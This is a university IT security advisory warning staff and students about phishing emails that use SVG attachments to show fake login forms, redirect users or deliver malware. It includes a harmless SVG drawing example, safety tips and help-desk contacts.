Body
Overview:
Phishing emails using SVG attachments pose a significant security risk by bypassing traditional detection methods. Understanding how these files work and following best practices can help safeguard university's security along with your own.
The Risk:
Hackers are using a tool called Scalable Vector Graphics (SVG) attachments in phishing emails. These attachments are used to:
- Display phishing forms that steal user credentials.
- Deploy malware to victims’ systems.
- Evade detection by security software.
SVG attachments are uncommon in legitimate emails and should raise suspicion if received unexpectedly.
What Are SVG Files?
SVG files are a type of image file that are based on object-oriented graphics as opposed to bit-mapped formats like JPG, PNG, BMP, and TIF files. Unlike bit-mapped files, which use pixels to form images, SVG files use mathematical formulas to create shapes, lines, and text.
Since SVGs are text-based, they can include embedded scripts, such as JavaScript, enabling interactive elements like clickable forms or automated redirects. Bad actors can exploit this format to deliver harmful code to your computer if you access one of these files.
Example SVG code:
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
<rect x="10" y="10" width="100" height="50" fill="blue" />
<circle cx="160" cy="40" r="40" fill="red" />
<text x="50" y="130" font-size="20" fill="black">Hello, SVG!</text>
</svg>
When opened in a browser, the code above generates a rectangle, a circle, and text.
Example of Malicious SVG:
The following links are to attached images that display what you would see if you were emailed an SVG file used in a phishing attack. When opened, it pretends to be a legitimate Excel document but includes a fake login form asking for your email and password. If you enter your details, they are sent directly to the attacker. This type of attachment is deceptive and should not be trusted. Always verify emails and avoid entering credentials in unexpected forms.
This is an example of how an SVG may appear as an attachment (with a properties window open beside it).
This is an example of an Excel file that would appear when opening a malicious SVG file.
How Threat Actors Use SVG Attachments:
- Phishing Forms: SVG attachments can display fake login forms to collect user credentials.
Example: A fake Excel spreadsheet prompting users to log in, which sends credentials to attackers.
- Malware Delivery: SVG attachments may contain links or scripts that download malicious files when clicked or opened.
- Automatic Redirects: Embedded scripts in SVGs can redirect users to phishing websites without requiring any user interaction. Simply opening the file may trigger a redirect to a malicious site, making these attachments highly deceptive and dangerous.
Why SVGs Evade Detection:
- SVG files are primarily text-based and often bypass security software designed to scan traditional image formats.
- Security software detection rates for malicious SVG files are low, often identifying only 1-2 threats out of multiple samples.
How to Stay Safe:
- Treat SVG Attachments as Suspicious:
- Legitimate emails rarely include SVG attachments.
- If you’re not expecting such files, delete the email immediately.
- Avoid Clicking Unknown Links:
- Never click on links or forms embedded in SVG attachments.
- Enable Email Security Measures:
- Ensure your email client is configured to block suspicious attachments.
- Use email filters to detect and quarantine potential phishing attempts.
- Use Advanced Security Tools:
- Employ antivirus software and tools that specifically monitor unusual email attachments.
- Report Suspicious Emails
- If you receive an email with an SVG attachment or suspect it to be phishing:
Contact the SLU IT Service Desk immediately.
Phone: 314-977-4000
Email: ask@slu.edu
Create a ticket via the AskSLU Service Portal: ask.slu.edu